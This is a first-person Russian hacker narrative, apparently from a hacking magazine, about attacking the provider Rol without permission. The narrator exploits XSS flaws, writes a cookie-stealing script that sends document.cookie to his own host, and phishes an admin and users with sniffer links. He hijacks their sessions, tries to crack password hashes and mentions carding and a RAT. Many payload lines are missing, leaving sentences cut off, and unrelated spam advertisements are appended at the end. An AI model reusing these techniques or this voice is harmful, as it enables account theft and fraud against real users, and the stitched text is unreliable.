Крупные хостинги и провайдеры всегда притягивали любопытный хакерский взгляд. И это не удивительно, ведь именно там хранятся базы данных с самой разнообразной информацией: от регистрационных анкет до пользовательских аккаунтов. Рол является одним из крупнейших провайдеров в России и Узбекистане, поэтому в этот раз выбор пал на него.
Быстрый старт
Одним из весенних вечеров, когда заняться было особенно нечем, мне на глаза попалась карточка Рола. Я не раз пользовался услугами данного провайдера, но сейчас меня заинтересовало совсем другое. А именно – защищенность его ресурсов. Недолго думая, я вбил в адресную строку www.rol.ru и нажал Enter. Как показал первый осмотр, ресурс оказался огромным. Кроме новостных лент, он содержал почтовый сервис, личный кабинет, фотоальбом и регистрационные формы. Но меня мало прельщало занятие в виде проверки всех поддоменов, поэтому я решил поверхностно осмотреть скрипты, полагаясь исключительно на кривые руки разработчиков и удачу. Каково же было мое удивление, когда через 15 минут я нашел раскрытие путей установочных каталогов и xss. Уязвимость присутствовала в скрипте second.php, находящемся по адресу: http://www.rol.ru/second.php. Параметр topic не фильтровал входящие данные, в результате чего скрипт любезно выполнял мой javascript-код в браузере. Достаточно было лишь указать запрос вида http://www.rol.ru/second.php?topic=10 — и можно было наблюдать приветливое окошечко с надписью «XSS». Сначала я обрадовался в надежде на возможность получения чужих куков. Но, осмотревшись внимательнее, понял, что не все так просто. Выяснилось, что скрипт фильтровал символ «+». Эту проблему я решил достаточно быстро, написав файл script.js и прилинковав его к основному запросу. Получился следующий линк: http://www.rol.ru/second.php?topic=10. В script.js я записал сам сценарий: open(‘http://stopthefraud.org/inf.php?’+document.cookie); после чего залил файл на сервер (stopthefraud.org). Тестирование завершилось удачно, уязвимость успешно эксплуатировалась. Но меня смущала одна немаловажная деталь - отсутствие в куках главного домена какой-либо полезной информации. Я хотел было уже приняться за исследование поддоменов, но к этому времени появился заказ — и мне пришлось сесть за работу, оставив в покое Рол.
Все с начала
Наступило лето, а вместе с ним и желание крупного взлома. И тут я вспомнил про Рол. Но, запустив браузер и зайдя по ссылке, я увидел, что админ пропатчил скрипт, и уязвимости больше нет. Меня это несколько огорчило, и я решил восполнить свою утрату любым путем. Для начала был произведен осмотр имеющих поддоменов в количестве 4-х штук: http://mail.rol.ru/ (почтовый сервис), http://voffice.rol.ru/ (личный кабинет), http://photo.rol.ru/ (фотоальбом), http://services.rol.ru/rus/ (цены и тарифы). В личном кабинете я не нашел ничего интересного. Все запросы грамотно фильтровались — и меня посылали куда подальше :). Аналогичная ситуация обстояла с services.rol.ru. На очереди находился почтовый сервис, который я собирался подвергнуть детальной проверке...
Вот они – баги
При заходе на mail.rol.ru я увидел сообщение: «Сервис работает в тестовом режиме. Приносим извинения за возможные неполадки». Неполадки? А вот это уже интересно. Первым делом я проверил систему авторизации. Но она была написана должным образом — и меня снова ждал облом. Тогда я залогинился и вошел в веб-интерфейс почтового сервиса. Вспомнив, что перед активными действиями хорошо бы узнать, к чему эти действия могут привести, я заглянул к себе в куки и обомлел... там лежали мои логин и пароль в открытом виде! Причем именно эти данные использовались для выхода в сеть. Разработчики системы не удосужились даже элементарно зашифровать пароль (например, md5 алгоритмом). Это обрадовало меня по двум причинам. Во-первых, для доступа в сеть и для доступа к мылу используются один и тот же логин/пасс. А во-вторых, если суметь каким-то образом похитить куки мыла, можно считать, что ты получаешь полное управление аккаунтом с доступом в личный кабинет. Собравшись с мыслями, я принял единственно верное решение: во что бы то ни стало найти уязвимость в почтовом сервисе. Но, как оказалось, сделать это было не так просто. Скрипты фильтровали все входящие данные, и изменение значений параметров ничего полезного не принесло. Я уже собирался уходить, когда заметил адресную книгу. Ничего особенного в ней не было, разве что не совсем обычная форма добавления контактов... точнее форма добавления необычных контактов:). Я думаю, ты понял, о чем идет речь. Поля «имя» и «email» не фильтровались — и мой код прекрасно выполнялся в браузере. Проблема заключалась в том, что все значения передавались методом post, следовательно, подсунуть юзеру «ядовитый» линк не представлялось возможным. При попытке передать значение внешним запросом скрипт ругнулся, выдав информацию:
A fatal error has occured:
Невозможно загрузить определение Turba_Driver_.
[line 44 of /sites/imp.rol.ru/horde/turba/lib/Driver.php]
Мне стало интересно, что это за скрипт Driver.php, находящийся к тому же в веб-директории. Но все мои попытки получить доступ к каталогу или скрипту из веба не увенчались успехом. Не хватало прав. Я задумался. Картина вырисовывалась следующая: есть куки с открытым пассом внутри, есть xss, но нет возможности сформировать линк для жертвы. Соответственно, проведение атаки становилось невозможным. Такой расклад меня явно не устраивал.
В запасе у меня оставался один непроверенный поддомен photo.rol.ru. Там располагался фотоальбом, куда каждый юзер мог закачать свои фотографии. Мои глаза медленно опустились вниз страницы, к строке «Powered by PhotoPost 4.7j». Как выяснилось, PhotoPost является платным движком, цена версии Pro – $120. Но все же мне удалось найти на него багтрак. Увы, в моем случае версия оказалась патченной. Выход был один – искать баги самому. Сперва мне захотелось поставить движок себе на локалхост и как следует разобраться в нем. Я зашел на официальный сайт фотоальбома и скардил себе Pro-версию. К сожалению, антифрод шопа просил подождать 1 бизнес-день для проверки вбитой мной информации. Так как ждать мне не хотелось, я вернулся на photo.rol.ru. Первым делом требовалось активировать свой аккаунт, после чего предлагалось придумать псевдоним автора, пароль оставался тот же, что и при подключении к сети. Это несколько обрадовало меня, но, посмотрев куки, я обнаружил, что пасс шифровался md5. Я залогинился и вошел внутрь. Здесь находилось меню для закачки фотографий, галерея, профиль, мастер альбомов, помощь, поиск, а также кнопка «Выход», которой я пока не собирался пользоваться. Я понимал, что пробовать закачивать файлы с левыми расширениями бесполезно, поэтому перешел сразу к профилю пользователя. Передо мной появилась страница с моими данными, я выбрал редактирование профиля и стал проверять поля на отсутствие фильтрации. Надо сказать, что я часто нахожу уязвимости, в том числе xss, на достаточно крупных ресурсах, но в тот момент, когда в окне моего браузера появилось окошко alert, я запомнил надолго. Мало того, что скрипт не фильтровал полученные данные из поля «Обо мне», так еще и выглядело все очень аккуратно — поле просто оставалось пустым. Таким образом, мне достаточно было указать в профиле в поле «Обо мне» вот такой скрипт:
Все полученные данные снифер бережно сохраняет в лог (slg.txt), после чего происходит редирект на фотоальбом (photo.rol.ru). В принципе, у меня все было готово для атаки, оставалось лишь выбрать жертву и впихнуть ей линк. Но что-то заставило меня исследовать альбом дальше. И, как оказалось, не зря. На нескольких секюрити-лентах я прочитал заметки о наличии xss в PhotoPost, но все приводившиеся примеры не работали в моем случае. Тогда я решил самостоятельно протестировать указанные в багтраках скрипты. Особенно мое внимание привлек скрипт showmembers.php. Подставив всем известную строчку в значение параметра perpage, я не получил желаемого результата, что нисколько не удивило меня. Просмотрев хтмл-код страницы, я нашел подставленные данные:
Для успешного выполнения кода было необходимо закрыть тэг
Все отлично работало. Но мне хотелось большего. Я проверил еще два параметра скрипта: ppuser и password — оба оказались уязвимыми, сплоит для них был общим. Изменив значение ppuser, я вновь просмотрел хтмл-код:
Требовалось закрыть кавычкой значение value и добавить />. А в общем виде сплоит выглядел так: “/>. Просмотрев еще несколько скриптов и не заметив ничего интересного, я вернулся к showmembers.php. Следует отметить, что данный скрипт был для меня просто «на вес золота». Проверив фильтрацию параметра si, я вновь в этом убедился. На этот раз хтмл-код содержал следующее:
Без труда составив сплоит: “, я проверил, что все работает на ура.
Таким образом, у меня на руках было 5 рабочих xss на photo.rol.ru и одна проблемная на mail.rol.ru. Весьма неплохой набор. Оставалось лишь выбрать жертву и впарить ей линк.
Выбор жертвы и первый урожай
Мне предстояло выбрать жертву. Конечно, в идеале хотелось получить админские куки. Я насчитал 5 админов в фотоальбоме, но ни у одного в профиле не было указано ни аси, ни мыла. Тогда мой взгляд привлекла домашняя страничка админа с ником Andy@. Зайдя по указанной в профиле ссылке, я попал на сайт какой-то домашней сети. По-видимому, это был сайт админа, но что самое главное – на нем был указан его email. Так как в наличии у меня имелось целых 5 xss, необходимо было определиться с используемой багой. Я решил работать с xss в профиле юзера. Во-первых, при выполнении кода поле «Обо мне» оставалось пустым, что не вызывало подозрений. А во-вторых, я собирался дать админу линк на профиль пользователя. Грамотно составить текст письма с вложенной ссылкой не вызвало особых затруднений. Я вставил в уязвимое поле код: и залил на сервер снифер. После чего отправил письмо админу с ником Andy@. У меня не было полной уверенности в том, что админ прочитает письмо и зайдет по указанному линку, поэтому я полагался лишь на удачу. И, как ни странно, мне повезло!
Буквально через 40 минут я обнаружил на сервере файл лога slg.txt с админскими куками:
Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Заменив в куках свои значения на админские, я моментально набрал в адресной строке photo.rol.ru. Все стало ясно по первой строчке приветствия фотоальбома: «Добро пожаловать, Andy@!». Получилось! Моей радости не было предела. Я сразу полез в админку. К счастью, там не требовалось ввода пароля. Окинув взглядом меню админки, я заметил опцию для работы с БД. Но внезапно вспомнил, что профиль моего пользователя, на который я давал ссылку админу, находится с внедренным javascript-кодом, что может вызвать подозрение у админа при последующих заходах по линку. Я быстро поменял значения куков назад и залогинился под своим юзером. Отредактировав профиль и удалив из поля «Обо мне» код, я вышел. Мне очень хотелось сделать дамп базы альбома. Но не тут-то было. Зайти обратно под админскими куками не получалось! Видимо, админ просек, в чем дело, и успел сменить пароль. Это событие сильно огорчило меня. Подумать только, я ведь мог сделать дамп базы и, возможно, залить веб-шелл, но не успел ни первого, ни второго. Получить админские данные еще раз было нереально. Но на всякий случай отправил админу похожее письмо. Я понимал, что шанс того, что Andy@ снова кликнет на линк, ничтожно мал, поэтому у меня появилась новая идея. Раз в админку мне уже не попасть, то почему бы не поднять несколько пользовательский акков? Тем более что у многих юзеров в профиле был указан email вида юзер@rol.ru, который являлся по совместительству логином к почтовому сервису и личному кабинету, а хэш пароля я мог получить при помощи xss. Я отобрал для эксперимента двух пользователей. Первый – с мылом вида юзер@rol.ru, а второй – со статусом «Privilege User». Отправив письма обоим, я стал ждать. Через час на сервере появился файл лога, из которого я успешно почерпнул куки обоих юзеров. Хэш пароля первого пользователя немедленно отправился на брут, а вот второй юзер, с ником Roman Bazalevsky, меня заинтересовал своим необычным статусом. Кроме того, этот пользователь занимал второе место вслед за админом в рейтинге активнейших авторов. К моему разочарованию, никакими дополнительными полномочиями Roman Bazalevsky не обладал, но вот большая часть его галереи являлась закрытой. Я быстро просмотрел все установленные юзером пароли — и мог теперь пользоваться его галереей из-под любого аккаунта:). Было уже под утро, и мне хотелось спать, учитывая две бессонные ночи. Я закрыл окно браузера, выключил монитор, лег на кровать и уснул.
Подводим итоги
Проспал я около 6 часов, не обращая внимания на будильник. Затем встал и подошел к монитору. Увы, но сбрутить хэш первого пользователя не удалось. Запустив крысу, я получил мессагу с заказом от LoFFi и два сообщения от kid_rock’a. Статус LoFFi показывал, что он спит, а вот kid_rock был на месте. Я отписал ему о ночных событиях, о найденных мной уязвимостях и о том, как пролетел с админкой. После недолгой беседы kid_rock выдвинул свой вариант. Он предлагал собрать спамбазу юзеров Рола и проспамить их с указанным линком. В результате данной операции мы могли получить здоровую базу с хэшами паролей пользователей, часть из которых наверняка бы сбрутилась. Но, обсудив все детали, мы приняли решение не делать этого. Веским аргументом послужили 2 невыполненных заказа, на которые попросту не хватило времени.
Я задумался. В голове крутился один вопрос: «Каковы итоги взлома?». Уже через несколько секунд я сам ответил себе на него. Не смотря на то, что я не успел сдампить базу, итоги были вполне удовлетворительными. У меня существовала возможность получить доступ практически к любому из нескольких тысяч аккаунтов Рола, включая доступ к почтовому сервису и личному кабинету. А ведь такая возможность могла существовать не у меня одного. Я думаю, не стоит и говорить, к чему могли привести ошибки программистов и администраторов Рола – одного из крупнейших провайдеров России.
Info
Многие считают, что xss – фактически бесполезная уязвимость. В своей статье я доказал, что это далеко не так. Часто возникают ситуации, когда кажется, что скрипт фильтрует входящие данные. Поэтому всегда просматривай html-код страницы, и тогда ты сможешь составить рабочий сплоит под конкретную xss-багу.
Мне на днях нужна была юридическая помощь и я слёзно искал хороший юридический центр! После чего с трудом обнаружил на http://www.consalt-centr.ru/sost_i_expertiza_dogovorov.html - Составление и экспертиза договоров . просмотрел их сайт и решился заказать предлагаемую услугу. После чего юридическая помощь дала о себе знать и я решил свои проблемы личностного характера. Теперь всем рекомендую Юридический центр Консалт.
Наткнулся на ссылку: http://srub-dizain.ru/pilomaterial - пиломатериалы от производителя и я стал добрее! Мне тогда срочно нужен был сухой профилированный брус камерного сушения. Короче зашёл туда и решил туда поехать! Там конечно всё организовано сделано и профилированный брус из сосны трудно прикупить. Всему данному событию сопутствовала навигация ресурса, которую легко нашёл. Хорошо конечно то, что это завод изготовитель – но сайтец страшный.
Нашёл отпугивающее предложение и оболдел! Написано оно было так: сдаю 6 квартирочку в жк http://odessarealt.com/tags/%CC%E0%F0%F1%E5%EB%FC/ - марсель Одесса Украина. Поблизости: ресторан Пальмира, пляж Аркадия, крутые пентхаусы и миллионер. Недвижимость со свежим дорогим ремонтом, Итальянской мебелью и недорогой бытовой техникой.
